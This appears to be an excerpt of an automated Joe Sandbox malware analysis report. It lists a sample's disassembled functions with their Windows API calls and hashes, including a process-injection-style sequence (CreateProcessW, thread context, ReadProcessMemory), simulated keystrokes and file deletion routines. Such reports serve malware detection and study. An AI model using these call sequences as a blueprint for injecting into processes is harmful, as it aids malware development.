                                                        • Instruction Fuzzy Hash: F111C272D16614DEF7197F68D84A3DC77A05F41371FA54260E5205F2E3CBBCA90086A6
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __lock_file_memset
                                                        • String ID:
                                                        • API String ID: 26237723-0
                                                        • Opcode ID: 210d6491a8b9a2399c97d3b52e8df805fbf9165a5c4ba00b0cd754b946ac0741
                                                        • Instruction ID: ee18c51b8a31f6c3d771a411e24e847cd80c49ae2184e482029c584e5c1ebd34
                                                        • Opcode Fuzzy Hash: 210d6491a8b9a2399c97d3b52e8df805fbf9165a5c4ba00b0cd754b946ac0741
                                                        • Instruction Fuzzy Hash: 940184B1C00209EBEF25AF699C0999F7B71BF80760F148215F42416193E7399A21EB91
                                                        APIs
                                                          • Part of subcall function 0073889E: __getptd_noexit.LIBCMT ref: 0073889E
                                                        • __lock_file.LIBCMT ref: 007342B9
                                                          • Part of subcall function 00735A9F: __lock.LIBCMT ref: 00735AC2
                                                        • __fclose_nolock.LIBCMT ref: 007342C4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                        • String ID:
                                                        • API String ID: 2800547568-0
                                                        • Opcode ID: 78caf4d5447777ffc4cf1b920322d850d22c28e970f3af0a7832cce0be5c16d5
                                                        • Instruction ID: e838f5e0d3f2578aaa02abce5cb021945450f859f7cb38f3a10157153e5c7bbb
                                                        • Opcode Fuzzy Hash: 78caf4d5447777ffc4cf1b920322d850d22c28e970f3af0a7832cce0be5c16d5
                                                        • Instruction Fuzzy Hash: 79F0B472801708DAF728AB79880AB5F6BD07F41334F218209B824BB1C3CB7CA9019B55
                                                        APIs
                                                        • CreateProcessW.KERNEL32(?,00000000), ref: 04D71A5B
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04D71AF1
                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 04D71B13
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1692690521.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d70000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                        • Instruction ID: c082b0951f42ddf1cf4f408a423160ea78713e83bd549538683795ae94e357ec
                                                        • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                        • Instruction Fuzzy Hash: 5E12DD24E24658C6EB24DF64D8507DEB232FF68300F1091E9910DEB7A4E77A5F81CB5A
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: 64a6ce5cdeccd3a1eda4ee4f790808e6738ecb720426c01faf0d91e7a443e3fb
                                                        • Instruction ID: 7de28f6955f39a0b92caa7449e580003b444a5c08f2a69e21ec6971100034550
                                                        • Opcode Fuzzy Hash: 64a6ce5cdeccd3a1eda4ee4f790808e6738ecb720426c01faf0d91e7a443e3fb
                                                        • Instruction Fuzzy Hash: CA413A70504651CFEB24DF18D448B1ABBE1BF45304F19856CE9964B362C339EC85CF92
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __getptd_noexit
                                                        • String ID:
                                                        • API String ID: 3074181302-0
                                                        • Opcode ID: 7d73569efa0ed76dc4c1848710279fc417d3be7bbfd0392529b60d979c86bf13
                                                        • Instruction ID: 2ea4a9c7ff71274908f7f6953bb4655e80261d97cf0b401f8b3aed39baf1e146
                                                        • Opcode Fuzzy Hash: 7d73569efa0ed76dc4c1848710279fc417d3be7bbfd0392529b60d979c86bf13
                                                        • Instruction Fuzzy Hash: 9C218BF2D11604CFFB116FB8C859799B7A06F423A1F6546A0F5604B1E3CBBC98008B66
                                                        APIs
                                                          • Part of subcall function 00713F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00713F90
                                                          • Part of subcall function 00734129: __wfsopen.LIBCMT ref: 00734134
                                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,007134E2,?,00000001), ref: 00713FCD
                                                          • Part of subcall function 00713E78: FreeLibrary.KERNEL32(00000000), ref: 00713EAB
                                                          • Part of subcall function 00714010: _memmove.LIBCMT ref: 0071405A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Library$Free$Load__wfsopen_memmove
                                                        • String ID:
                                                        • API String ID: 1396898556-0
                                                        • Opcode ID: e2a860e49bbdbcc569e3a055ee6554a0996bf15b1109985165162247e0fba2df
                                                        • Instruction ID: 49c8b0d2cabc00d09579b04183ead3744d96b657b5100bacb358c3c44ef917a1
                                                        • Opcode Fuzzy Hash: e2a860e49bbdbcc569e3a055ee6554a0996bf15b1109985165162247e0fba2df
                                                        • Instruction Fuzzy Hash: 2B11A332610309FACB24BB68DC0ABDD76A9AF50B41F108829F542E71C1DB7C9E85AB50
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: 8e6e6d0b56abf3701c747829dc9b611b6665ea0b443b5c0b1a17c5e202945348
                                                        • Instruction ID: ea4c7d816aff1aa49f2f2e019d943ef62c23ce2ce36d433aeea1150186335366
                                                        • Opcode Fuzzy Hash: 8e6e6d0b56abf3701c747829dc9b611b6665ea0b443b5c0b1a17c5e202945348
                                                        • Instruction Fuzzy Hash: 90212570508651CFEB24DF28D448B1ABBE1BF89344F154968E99647622C339F885CFA2
                                                        APIs
                                                        • ___lock_fhandle.LIBCMT ref: 0073BD73
                                                          • Part of subcall function 0073886A: __getptd_noexit.LIBCMT ref: 0073886A
                                                          • Part of subcall function 0073889E: __getptd_noexit.LIBCMT ref: 0073889E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __getptd_noexit$___lock_fhandle
                                                        • String ID:
                                                        • API String ID: 1144279405-0
                                                        • Opcode ID: 2182703caa611f48bd50398bbb22b94a4909bd32c7a4cf8f95918a31f5f92603
                                                        • Instruction ID: f12716ddeaccb3f0c9588988c877b85eb27daef438d5b84162d3d40bfb82a49f
                                                        • Opcode Fuzzy Hash: 2182703caa611f48bd50398bbb22b94a4909bd32c7a4cf8f95918a31f5f92603
                                                        • Instruction Fuzzy Hash: 2E119172A25614DFF7126F64D84A79C77606F41331FA54244F6640F1E3DBBC99008BA6
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                        • Instruction ID: 25650c7ebe5d70084d8ece8907b7ce62483d1c5965268cf5e7669fd316fa8c4d
                                                        • Instruction Fuzzy Hash: EB01FEB1144701AED3259B7CD80BE66B7B4DF44760F50C53EF55ACB1D1EB75E4408690
                                                        APIs
                                                          • Part of subcall function 0074A857: CLSIDFromProgID.COMBASE ref: 0074A874
                                                          • Part of subcall function 0074A857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 0074A88F
                                                          • Part of subcall function 0074A857: lstrcmpiW.KERNEL32(?,00000000), ref: 0074A89D
                                                          • Part of subcall function 0074A857: CoTaskMemFree.COMBASE(00000000), ref: 0074A8AD
                                                        • IIDFromString.COMBASE(00000000,?), ref: 0075128C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                        • String ID:
                                                        • API String ID: 3897988419-0
                                                        • Opcode ID: ec7a456b5f475e0187c2648f8f2bfc794b37e1a68978fc86bce6ca8a4d2bb4b1
                                                        • Instruction ID: 65494e4f0adb115d8c8eeee0acd167ed725055d175cdd7ece9264f74fe47e6cd
                                                        • Instruction Fuzzy Hash: 73F09075240205EBCB00CE05D880FD67B69FB49332F50C129ED08CE105D7F9E949CBA0
                                                        APIs
                                                        • __lock_file.LIBCMT ref: 0073377D
                                                          • Part of subcall function 0073889E: __getptd_noexit.LIBCMT ref: 0073889E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __getptd_noexit__lock_file
                                                        • String ID:
                                                        • API String ID: 2597487223-0
                                                        • Opcode ID: 1841c7cf978532abda3bd14b84061f9da728628892cabf96d714569d4d070716
                                                        • Instruction ID: d08fb11306572869762d1de99a168b1fcd08775e2966894c805af3d9289d9e3c
                                                        • Instruction Fuzzy Hash: 8EF062F1500209EAFF31AF748C4A7EE7660AF00321F148514B4149A193D77D8B50DB91
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,007134E2,?,00000001), ref: 00713E6D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID:
                                                        • API String ID: 3664257935-0
                                                        • Opcode ID: 152de02c9cf2391e5a78aae096e0c4897a9e05fe2410de62648e73f2ca0964bc
                                                        • Instruction ID: 3f99b06d5ca894612bba6b024f996d62467fd733492aa246b59017f271f8e031
                                                        • Instruction Fuzzy Hash: E7F039B5101741CFDB349F68D494893BBF0BF047153248A3FE1D682661C739A988DF00
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock
                                                        • String ID:
                                                        • API String ID: 2638373210-0
                                                        • Opcode ID: 492180ca1bef3efad2d53918f452df281755ef4fe598974afbbc038f049d315f
                                                        • Instruction ID: e5290028ab8cdc0fb91abbb08492761511dd778a98ef8263a296ff2c78109d3b
                                                        • Instruction Fuzzy Hash: FEE092B1604B009FDF398A24D8407E373E8DB45311F00081DF6AA82243E6B278098649
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __wfsopen
                                                        • String ID:
                                                        • API String ID: 197181222-0
                                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                        • Instruction ID: 14bf6a6adfd0c5f4aef2e309d276156da24f8723ff868630ed3e63eb4aa2d694
                                                        • Instruction Fuzzy Hash: 83B0927244030CB7DE112A82EC02A493B199B50660F008020FB0C18162A677AAA09A89
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction ID: 22f764781426ea2fcb5445d0796cb0e5d6aa7bf0f4b547873e159abd4bc633fd
                                                        • Instruction Fuzzy Hash: 7031D470A04116ABC718DF58E480A69FBB5FB49300B2482BAE48ACB355D735EDC1CBD0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1692690521.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d70000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction ID: 14638eca4c2649e4ed25e861034fea3b983430149aec35e9e05df85cc130a10b
                                                        • Instruction Fuzzy Hash: CAE0E67494010EDFDB00EFB4D54969E7FF4EF04301F1005A1FD01D2280D6309D508A72
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                        • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 0077F64E
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0077F6AD
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0077F6EA
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0077F711
                                                        • SendMessageW.USER32 ref: 0077F737
                                                        • _wcsncpy.LIBCMT ref: 0077F7A3
                                                        • GetKeyState.USER32(00000011), ref: 0077F7C4
                                                        • GetKeyState.USER32(00000009), ref: 0077F7D1
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0077F7E7
                                                        • GetKeyState.USER32(00000010), ref: 0077F7F1
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0077F820
                                                        • SendMessageW.USER32 ref: 0077F843
                                                        • SendMessageW.USER32(?,00001030,?,0077DE69), ref: 0077F940
                                                        • SetCapture.USER32(?), ref: 0077F970
                                                        • ClientToScreen.USER32(?,?), ref: 0077F9D4
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0077F9FA
                                                        • ReleaseCapture.USER32 ref: 0077FA05
                                                        • GetCursorPos.USER32(?), ref: 0077FA3A
                                                        • ScreenToClient.USER32(?,?), ref: 0077FA47
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0077FAA9
                                                        • SendMessageW.USER32 ref: 0077FAD3
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0077FB12
                                                        • SendMessageW.USER32 ref: 0077FB3D
                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0077FB55
                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0077FB60
                                                        • GetCursorPos.USER32(?), ref: 0077FB81
                                                        • ScreenToClient.USER32(?,?), ref: 0077FB8E
                                                        • GetParent.USER32(?), ref: 0077FBAA
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0077FC10
                                                        • SendMessageW.USER32 ref: 0077FC40
                                                        • ClientToScreen.USER32(?,?), ref: 0077FC96
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0077FCC2
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0077FCEA
                                                        • SendMessageW.USER32 ref: 0077FD0D
                                                        • ClientToScreen.USER32(?,?), ref: 0077FD57
                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0077FD87
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0077FE1C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                        • String ID: @GUI_DRAGID$F
                                                        • API String ID: 3461372671-4164748364
                                                        • Opcode ID: ec7636eeb68733ee4f4f457657de5b9c835ffe0b6eaa03cc627775c35e2bc1d2
                                                        • Instruction ID: c78a9a93dbc0a11bd3211b0fdfabdb883bce5d0ef1d84de9d67e05d6ff5107be
                                                        • Instruction Fuzzy Hash: D132BD70204201AFDB20DF68CA84AAABBF5FF48394F14852AFA59C72B1D739DD51CB51
                                                        APIs
                                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0077AFDB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: %d/%02d/%02d
                                                        • API String ID: 3850602802-328681919
                                                        • Opcode ID: 6407c729e6faa780f7b274cad85ae803f37981af022f36645418fa28dd5b34a0
                                                        • Instruction ID: 836a9505f6c3c18f702788b8abe9155bc1f37082a9b9baf58e4ec36e9900cafc
                                                        • Instruction Fuzzy Hash: 7412BFB1604204BBFF258F64CC49FAE7BB8EF85790F10821AF5199B291DB78D941CB52
                                                        APIs
                                                        • GetForegroundWindow.USER32(00000000,00000000), ref: 0072F796
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00784388
                                                        • IsIconic.USER32(000000FF), ref: 00784391
                                                        • ShowWindow.USER32(000000FF,00000009), ref: 0078439E
                                                        • SetForegroundWindow.USER32(000000FF), ref: 007843A8
                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007843BE
                                                        • GetCurrentThreadId.KERNEL32 ref: 007843C5
                                                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 007843D1
                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 007843E2
                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 007843EA
                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 007843F2
                                                        • SetForegroundWindow.USER32(000000FF), ref: 007843F5
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078440A
                                                        • keybd_event.USER32(00000012,00000000), ref: 00784415
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078441F
                                                        • keybd_event.USER32(00000012,00000000), ref: 00784424
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078442D
                                                        • keybd_event.USER32(00000012,00000000), ref: 00784432
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078443C
                                                        • keybd_event.USER32(00000012,00000000), ref: 00784441
                                                        • SetForegroundWindow.USER32(000000FF), ref: 00784444
                                                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 0078446B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 4125248594-2988720461
                                                        • Opcode ID: 83d7dce99b7407b629a35c9f351ba4a2d27faa09a7afd884e2d81f35f2929095
                                                        • Instruction ID: afd71d9ff1beb0fbf99fc65b1788c539d12c74671c8828e30fa079f869d3211a
                                                        • Opcode Fuzzy Hash: 83d7dce99b7407b629a35c9f351ba4a2d27faa09a7afd884e2d81f35f2929095
                                                        • Instruction Fuzzy Hash: 19318871A803187BEB316B719C49F7F3E6CEB44B90F118026FA05E61D1D6B85D11AFA4
                                                        APIs
                                                          • Part of subcall function 007131B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 007131DA
                                                          • Part of subcall function 00757B9F: __wsplitpath.LIBCMT ref: 00757BBC
                                                          • Part of subcall function 00757B9F: __wsplitpath.LIBCMT ref: 00757BCF
                                                          • Part of subcall function 00757C0C: GetFileAttributesW.KERNEL32(?,00756A7B), ref: 00757C0D
                                                        • _wcscat.LIBCMT ref: 00756B9D
                                                        • _wcscat.LIBCMT ref: 00756BBB
                                                        • __wsplitpath.LIBCMT ref: 00756BE2
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00756BF8
                                                        • _wcscpy.LIBCMT ref: 00756C57
                                                        • _wcscat.LIBCMT ref: 00756C6A
                                                        • _wcscat.LIBCMT ref: 00756C7D
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00756CAB
                                                        • DeleteFileW.KERNEL32(?), ref: 00756CBC
                                                        • MoveFileW.KERNEL32(?,?), ref: 00756CDB
                                                        • MoveFileW.KERNEL32(?,?), ref: 00756CEA
                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00756CFF
                                                        • DeleteFileW.KERNEL32(?), ref: 00756D10
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00756D37
                                                        • FindClose.KERNEL32(00000000), ref: 00756D53
                                                        • FindClose.KERNEL32(00000000), ref: 00756D61
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
